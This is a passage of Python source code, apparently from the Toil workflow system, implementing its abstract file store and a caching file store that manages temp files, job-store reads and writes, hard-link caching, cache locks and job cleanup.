_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior-to, and after a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True then the copy of the global file will be deleted once the
job and all its successors have completed running. If not the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the ID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
return self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID)
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the name of file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes Local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because mac OS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to key
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that state file and reads it into an object that is returned
to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file then initialize and instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
(clean up their presence ont he node, and run any registered defer functions)
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
:param dir_: The jeystone directory containing the required information for fixing the state
of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard-links and asynchronous job store writes to
reduce I/O between, and during jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
# cacheDir has to be 1 levels above local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can bookkeep the job's file store operated files in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've setup all the required variables, setup the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detecting that one or more jobs on this node have used more '
'resources than requested. Turn on debug logs to see more'
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# What does this do?
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
# are on the same file system, then we want to hard link the files istead of copying
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
# A file handle added to the queue allows the asyncWrite threads to remove their
# jobID from _pendingFileWrites. Therefore, a file should only be added after
# its fileID is added to _pendingFileWrites
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
The cache parameter will be used only if the file isn't already in the cache, and
provided user path (if specified) is in the scope of local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
raise RuntimeError('Trying to access a file in the jobStore you\'ve deleted: ' + \
'%s' % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
# yes, this is illegal now.
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
fileIsLocal = True if localFilePath.startswith(self.localTempDir) else False
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
# If the file is not in cache, check whether the .harbinger file for the given
# FileStoreID exists. If it does, the wait and periodically check for the removal
# of the file and the addition of the completed download into cache of the file by
# the other job. Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, First create the harbinger
# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)))
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
# If the download succeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
# job store is FilejobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
# The file is still being writting to the job store - wait for this process to finish prior to
# exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# The local file may or may not have been cached. If it was, we need to do some
# bookkeeping. If it wasn't, we just delete the file and continue with no might need
# some bookkeeping if the file store and cache live on the same filesystem. We can know
# if a file was cached or not based on the value held in the third tuple value for the
# dict item having key = fileStoreID. If it was cached, it holds the value True else
# False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
# EOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
logger.warn("the size on record differed from the real size by " +
"%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the Lock file that will be used to
prevent synchronous cache operations between workers.
:yields: File descriptor for cache lock file in w mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
# The only acceptable FAIL case is that the destination is a non-empty directory
# directory. Assuming (it's ambiguous) atomic renaming of directories, if the
# dst is non-empty, it only means that another worker has beaten this one to the
# rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
Create the cache lock file file to contain the state of the cache on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
# The nlink threshold is setup along with the first instance of the cache class on the
# node.
self.setNlinkThreshold()
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a url safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as filename within the cache folder. jobstore IDs are essentially urls/paths to
files and thus cannot be used as is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
:return: outCachedFile: A path to the hashed file in localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text
# Its probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, does
it need to be linked to the required location, or copied. If it is copied, can the file
still be retained in cache?
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
logger.debug('Could not download both download ' +
'%s as mutable and add to ' % os.path.basename(localFilePath) +
'cache. Hence only mutable copy retained.')
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
